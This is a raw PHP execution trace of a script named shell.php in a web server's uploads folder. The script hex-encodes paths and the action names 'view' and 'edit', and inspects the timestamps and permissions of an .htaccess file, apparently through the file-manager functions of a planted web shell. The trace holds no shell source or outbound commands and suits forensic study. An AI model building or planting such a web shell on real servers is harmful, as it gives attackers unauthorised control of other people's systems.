3 841 1 0.030047 484368
3 841 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 842 0 0.030076 484296 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 842 1 0.030087 484336
3 842 R 112
3 843 0 0.030099 484296 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 843 1 0.030110 484368
3 843 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 844 0 0.030139 484304 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 844 1 0.030150 484344
3 844 R 108
3 845 0 0.030162 484304 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 845 1 0.030173 484376
3 845 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 846 0 0.030202 484304 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 846 1 0.030213 484344
3 846 R 111
3 847 0 0.030225 484304 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 847 1 0.030236 484376
3 847 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 848 0 0.030265 484304 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 848 1 0.030276 484344
3 848 R 97
3 849 0 0.030288 484304 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 849 1 0.030299 484376
3 849 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 850 0 0.030328 484304 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 850 1 0.030339 484344
3 850 R 100
3 851 0 0.030352 484304 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 851 1 0.030363 484376
3 851 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 852 0 0.030393 484320 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 852 1 0.030404 484360
3 852 R 115
3 853 0 0.030416 484320 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 853 1 0.030427 484392
3 853 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 811 1 0.030456 484320
2 811 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 854 0 0.030473 484336 hex 1 /var/www/html/uploads/shell.php 128 1 'view'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 855 0 0.030504 484336 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 855 1 0.030519 484376
3 855 R 118
3 856 0 0.030532 484336 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 856 1 0.030543 484408
3 856 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 857 0 0.030572 484368 ord 0 /var/www/html/uploads/shell.php 19 1 'i'
3 857 1 0.030584 484408
3 857 R 105
3 858 0 0.030596 484368 dechex 0 /var/www/html/uploads/shell.php 19 1 105
3 858 1 0.030608 484440
3 858 R '69'
2 A /var/www/html/uploads/shell.php 19 $r .= '69'
2 A /var/www/html/uploads/shell.php 18 $i++
3 859 0 0.030637 484368 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 859 1 0.030648 484408
3 859 R 101
3 860 0 0.030660 484368 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 860 1 0.030672 484440
3 860 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 861 0 0.030702 484368 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 861 1 0.030713 484408
3 861 R 119
3 862 0 0.030725 484368 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 862 1 0.030737 484440
3 862 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
2 854 1 0.030766 484376
2 854 R '76696577'
2 863 0 0.030780 484352 hex 1 /var/www/html/uploads/shell.php 128 1 '.htaccess'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 864 0 0.030810 484352 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 864 1 0.030821 484392
3 864 R 46
3 865 0 0.030834 484352 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 865 1 0.030845 484424
3 865 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 866 0 0.030875 484384 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 866 1 0.030886 484424
3 866 R 104
3 867 0 0.030898 484384 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 867 1 0.030909 484456
3 867 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 868 0 0.030938 484384 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 868 1 0.030949 484424
3 868 R 116
3 869 0 0.030961 484384 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 869 1 0.030972 484456
3 869 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 870 0 0.031001 484384 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 870 1 0.031013 484424
3 870 R 97
3 871 0 0.031025 484384 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 871 1 0.031035 484456
3 871 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 872 0 0.031064 484392 ord 0 /var/www/html/uploads/shell.php 19 1 'c'
3 872 1 0.031076 484432
3 872 R 99
3 873 0 0.031088 484392 dechex 0 /var/www/html/uploads/shell.php 19 1 99
3 873 1 0.031099 484464
3 873 R '63'
2 A /var/www/html/uploads/shell.php 19 $r .= '63'
2 A /var/www/html/uploads/shell.php 18 $i++
3 874 0 0.031127 484392 ord 0 /var/www/html/uploads/shell.php 19 1 'c'
3 874 1 0.031139 484432
3 874 R 99
3 875 0 0.031150 484392 dechex 0 /var/www/html/uploads/shell.php 19 1 99
3 875 1 0.031161 484464
3 875 R '63'
2 A /var/www/html/uploads/shell.php 19 $r .= '63'
2 A /var/www/html/uploads/shell.php 18 $i++
3 876 0 0.031189 484392 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 876 1 0.031200 484432
3 876 R 101
3 877 0 0.031212 484392 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 877 1 0.031223 484464
3 877 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 878 0 0.031261 484392 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 878 1 0.031272 484432
3 878 R 115
3 879 0 0.031284 484392 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 879 1 0.031295 484464
3 879 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
3 880 0 0.031324 484400 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 880 1 0.031335 484440
3 880 R 115
3 881 0 0.031347 484400 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 881 1 0.031358 484472
3 881 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 863 1 0.031386 484400
2 863 R '2e6874616363657373'
2 882 0 0.031402 484488 filemtime 0 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/.htaccess'
2 882 1 0.031415 484528
2 882 R 1676261585
2 883 0 0.031428 484432 date 0 /var/www/html/uploads/shell.php 128 2 'Y-m-d H:i' 1676261585
2 883 1 0.031464 484760
2 883 R '2023-02-12 23:13'
2 884 0 0.031480 484616 is_writable 0 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/.htaccess'
2 884 1 0.031500 484656
2 884 R FALSE
2 885 0 0.031513 484616 is_readable 0 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/.htaccess'
2 885 1 0.031528 484656
2 885 R TRUE
2 886 0 0.031543 484616 perms 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads/.htaccess'
3 887 0 0.031556 484616 fileperms 0 /var/www/html/uploads/shell.php 32 1 '/var/www/html/uploads/.htaccess'
3 887 1 0.031568 484656
3 887 R 33188
2 A /var/www/html/uploads/shell.php 32 $p = 33188
2 A /var/www/html/uploads/shell.php 38 $i = '-'
2 A /var/www/html/uploads/shell.php 50 $i .= 'r'
2 A /var/www/html/uploads/shell.php 51 $i .= 'w'
2 A /var/www/html/uploads/shell.php 52 $i .= '-'
2 A /var/www/html/uploads/shell.php 53 $i .= 'r'
2 A /var/www/html/uploads/shell.php 54 $i .= '-'
2 A /var/www/html/uploads/shell.php 55 $i .= '-'
2 A /var/www/html/uploads/shell.php 56 $i .= 'r'
2 A /var/www/html/uploads/shell.php 57 $i .= '-'
2 A /var/www/html/uploads/shell.php 58 $i .= '-'
2 886 1 0.031680 484656
2 886 R '-rw-r--r--'
2 888 0 0.031694 484624 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 889 0 0.031724 484624 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 889 1 0.031735 484664
3 889 R 47
3 890 0 0.031748 484624 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 890 1 0.031759 484696
3 890 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 891 0 0.031789 484656 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 891 1 0.031801 484696
3 891 R 118
3 892 0 0.031813 484656 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 892 1 0.031824 484728
3 892 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 893 0 0.031854 484656 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 893 1 0.031866 484696
3 893 R 97
3 894 0 0.031877 484656 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 894 1 0.031889 484728
3 894 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 895 0 0.031918 484656 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 895 1 0.031929 484696
3 895 R 114
3 896 0 0.031942 484656 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 896 1 0.031953 484728
3 896 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 897 0 0.031982 484664 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 897 1 0.031998 484704
3 897 R 47
3 898 0 0.032010 484664 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 898 1 0.032021 484736
3 898 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 899 0 0.032050 484664 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 899 1 0.032062 484704
3 899 R 119
3 900 0 0.032074 484664 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 900 1 0.032085 484736
3 900 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 901 0 0.032114 484664 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 901 1 0.032125 484704
3 901 R 119
3 902 0 0.032137 484664 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 902 1 0.032148 484736
3 902 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 903 0 0.032176 484664 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 903 1 0.032187 484704
3 903 R 119
3 904 0 0.032199 484664 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 904 1 0.032210 484736
3 904 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 905 0 0.032238 484672 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 905 1 0.032250 484712
3 905 R 47
3 906 0 0.032262 484672 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 906 1 0.032273 484744
3 906 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 907 0 0.032302 484672 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 907 1 0.032313 484712
3 907 R 104
3 908 0 0.032325 484672 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 908 1 0.032336 484744
3 908 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 909 0 0.032365 484672 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 909 1 0.032377 484712
3 909 R 116
3 910 0 0.032389 484672 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 910 1 0.032400 484744
3 910 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 911 0 0.032429 484672 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 911 1 0.032440 484712
3 911 R 109
3 912 0 0.032452 484672 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 912 1 0.032463 484744
3 912 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 913 0 0.032492 484680 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 913 1 0.032504 484720
3 913 R 108
3 914 0 0.032516 484680 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 914 1 0.032527 484752
3 914 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 915 0 0.032555 484680 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 915 1 0.032567 484720
3 915 R 47
3 916 0 0.032579 484680 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 916 1 0.032590 484752
3 916 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 917 0 0.032619 484680 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 917 1 0.032631 484720
3 917 R 117
3 918 0 0.032643 484680 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 918 1 0.032654 484752
3 918 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 919 0 0.032683 484680 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 919 1 0.032694 484720
3 919 R 112
3 920 0 0.032706 484680 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 920 1 0.032721 484752
3 920 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 921 0 0.032750 484688 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 921 1 0.032762 484728
3 921 R 108
3 922 0 0.032774 484688 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 922 1 0.032785 484760
3 922 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 923 0 0.032814 484688 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 923 1 0.032825 484728
3 923 R 111
3 924 0 0.032837 484688 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 924 1 0.032848 484760
3 924 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 925 0 0.032877 484688 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 925 1 0.032888 484728
3 925 R 97
3 926 0 0.032900 484688 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 926 1 0.032912 484760
3 926 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 927 0 0.032940 484688 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 927 1 0.032951 484728
3 927 R 100
3 928 0 0.032963 484688 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 928 1 0.032974 484760
3 928 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 929 0 0.033002 484704 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 929 1 0.033013 484744
3 929 R 115
3 930 0 0.033025 484704 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 930 1 0.033036 484776
3 930 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 888 1 0.033065 484704
2 888 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 931 0 0.033080 484688 hex 1 /var/www/html/uploads/shell.php 128 1 'edit'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 932 0 0.033110 484688 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 932 1 0.033121 484728
3 932 R 101
3 933 0 0.033133 484688 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 933 1 0.033144 484760
3 933 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 934 0 0.033173 484720 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 934 1 0.033184 484760
3 934 R 100
3 935 0 0.033196 484720 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 935 1 0.033207 484792
3 935 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 936 0 0.033236 484720 ord 0 /var/www/html/uploads/shell.php 19 1 'i'
3 936 1 0.033247 484760
3 936 R 105
3 937 0 0.033259 484720 dechex 0 /var/www/html/uploads/shell.php 19 1 105
3 937 1 0.033270 484792
3 937 R '69'
2 A /var/www/html/uploads/shell.php 19 $r .= '69'
2 A /var/www/html/uploads/shell.php 18 $i++
3 938 0 0.033299 484720 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 938 1 0.033310 484760
3 938 R 116
3 939 0 0.033337 484720 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 939 1 0.033349 484792
3 939 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
2 931 1 0.033378 484728
2 931 R '65646974'
2 940 0 0.033391 484688 hex 1 /var/www/html/uploads/shell.php 128 1 '.htaccess'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 941 0 0.033422 484688 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 941 1 0.033437 484728
3 941 R 46
3 942 0 0.033449 484688 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 942 1 0.033460 484760
3 942 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 943 0 0.033490 484720 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 943 1 0.033501 484760
3 943 R 104
3 944 0 0.033513 484720 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 944 1 0.033524 484792
3 944 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 945 0 0.033553 484720 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 945 1 0.033564 484760
3 945 R 116
3 946 0 0.033576 484720 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 946 1 0.033587 484792
3 946 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 947 0 0.033616 484720 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 947 1 0.033627 484760
3 947 R 97
3 948 0 0.033638 484720 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 948 1 0.033649 484792
3 948 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 949 0 0.033678 484728 ord 0 /var/www/html/uploads/shell.php 19 1 'c'
3 949 1 0.033689 484768
3 949 R 99
3 950 0 0.033701 484728 dechex 0 /var/www/html/uploads/shell.php 19 1 99
3 950 1 0.033712 484800
3 950 R '63'
2 A /var/www/html/uploads/shell.php 19 $r .= '63'
2 A /var/www/html/uploads/shell.php 18 $i++
3 951 0 0.033740 484728 ord 0 /var/www/html/uploads/shell.php 19 1 'c'
3 951 1 0.033752 484768
3 951 R 99
3 952 0 0.033764 484728 dechex 0 /var/www/html/uploads/shell.php 19 1 99
3 952 1 0.033775 484800
3 952 R '63'
2 A /var/www/html/uploads/shell.php 19 $r .= '63'
2 A /var/www/html/uploads/shell.php 18 $i++
3 953 0 0.033803 484728 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 953 1 0.033814 484768
3 953 R 101
3 954 0 0.033826 484728 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 954 1 0.033837 484800
3 954 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 955 0 0.033865 484728 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 955 1 0.033876 484768
3 955 R 115
3 956 0 0.033888 484728 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 956 1 0.033899 484800
3 956 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
3 957 0 0.033927 484736 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 957 1 0.033939 484776
3 957 R 115
3 958 0 0.033950 484736 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 958 1 0.033962 484808
3 958 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 940 1 0.033990 484736
2 940 R '2e6874616363657373'
2 959 0 0.034004 484880 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 960 0 0.034034 484880 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 960 1 0.034045 484920
3 960 R 47
3 961 0 0.034057 484880 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 961 1 0.034068 484952
3 961 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 962 0 0.034097 484912 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 962 1 0.034108 484952
3 962 R 118
3 963 0 0.034120 484912 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 963 1 0.034130 484984
3 963 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 964 0 0.034162 484912 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 964 1 0.034173 484952
3 964 R 97
3 965 0 0.034185 484912 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 965 1 0.034196 484984
3 965 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 966 0 0.034225 484912 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 966 1 0.034236 484952
3 966 R 114
3 967 0 0.034247 484912 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 967 1 0.034258 484984
3 967 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 968 0 0.034287 484920 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 968 1 0.034298 484960
3 968 R 47
3 969 0 0.034310 484920 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 969 1 0.034322 484992
3 969 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 970 0 0.034350 484920 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 970 1 0.034361 484960
3 970 R 119
3 971 0 0.034373 484920 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 971 1 0.034384 484992
3 971 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 972 0 0.034412 484920 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 972 1 0.034423 484960
3 972 R 119
3 973 0 0.034435 484920 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 973 1 0.034446 484992
3 973 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 974 0 0.034474 484920 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 974 1 0.034485 484960
3 974 R 119
3 975 0 0.034497 484920 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 975 1 0.034508 484992
3 975 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 976 0 0.034536 484928 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 976 1 0.034547 484968
3 976 R 47
3 977 0 0.034559 484928 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 977 1 0.034570 485000
3 977 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 978 0 0.034599 484928 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 978 1 0.034610 484968
3 978 R 104
3 979 0 0.034622 484928 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 979 1 0.034633 485000
3 979 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 980 0 0.034662 484928 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 980 1 0.034673 484968
3 980 R 116
3 981 0 0.034685 484928 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 981 1 0.034696 485000
3 981 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 982 0 0.034725 484928 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 982 1 0.034736 484968
3 982 R 109
3 983 0 0.034748 484928 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 983 1 0.034758 485000
3 983 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 984 0 0.034787 484936 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 984 1 0.034798 484976
3 984 R 108
3 985 0 0.034810 484936 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 985 1 0.034820 485008
3 985 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 986 0 0.034849 484936 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 986 1 0.034865 484976
3 986 R 47
3 987 0 0.034877 484936 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 987 1 0.034888 485008
3 987 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 988 0 0.034917 484936 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 988 1 0.034928 484976
3 988 R 117
3 989 0 0.034940 484936 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 989 1 0.034951 485008
3 989 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 990 0 0.034980 484936 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 990 1 0.034991 484976
3 990 R 112
3 991 0 0.035003 484936 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 991 1 0.035014 485008
3 991 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 992 0 0.035042 484944 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 992 1 0.035053 484984
3 992 R 108
3 993 0 0.035065 484944 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 993 1 0.035075 485016
3 993 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 994 0 0.035104 484944 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 994 1 0.035115 484984
3 994 R 111
3 995 0 0.035126 484944 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 995 1 0.035137 485016
3 995 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 996 0 0.035165 484944 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 996 1 0.035176 484984
3 996 R 97
3 997 0 0.035188 484944 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 997 1 0.035199 485016
3 997 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
